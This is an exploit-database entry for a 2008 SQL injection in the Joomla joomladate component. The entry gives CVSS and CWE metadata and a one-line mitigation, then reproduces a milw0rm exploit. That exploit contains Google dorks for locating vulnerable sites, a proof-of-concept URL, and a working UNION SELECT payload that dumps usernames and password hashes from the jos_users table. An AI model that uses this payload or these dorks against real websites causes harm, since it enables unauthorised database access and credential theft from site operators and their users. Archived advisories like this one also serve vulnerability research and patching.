header-logo
Suggest Exploit
vendor:
joomladate
by:
His0k4
8.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: joomladate
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Joomla Component joomladate Remote SQL injection

A vulnerability in Joomla Component joomladate allows remote attackers to inject arbitrary SQL commands via the user parameter in a viewProfile action to index.php.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.
Source

Exploit-DB raw data:

/---------------------------------------------------------------\
\                                				/
/       Joomla Component joomladate Remote SQL injection        \
\                                				/
\---------------------------------------------------------------/


[*] Author    :  His0k4 [ALGERIAN HaCkEr]

[*] Dork      :  inurl:com_joomladate
[*] Dork 2    :  inurl:com_joomladate "user"

[*] POC        : http://localhost/[Joomla_Path]/index.php?option=com_joomladate&task=viewProfile&user={SQL}

[*] Example    : http://localhost/[Joomla_Path]/index.php?option=com_joomladate&task=viewProfile&user=9999999 UNION SELECT user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user(),user() FROM jos_users--

                
----------------------------------------------------------------------------
[*] Greetings :  Str0ke, all friends & muslims HaCkeRs...

# milw0rm.com [2008-06-05]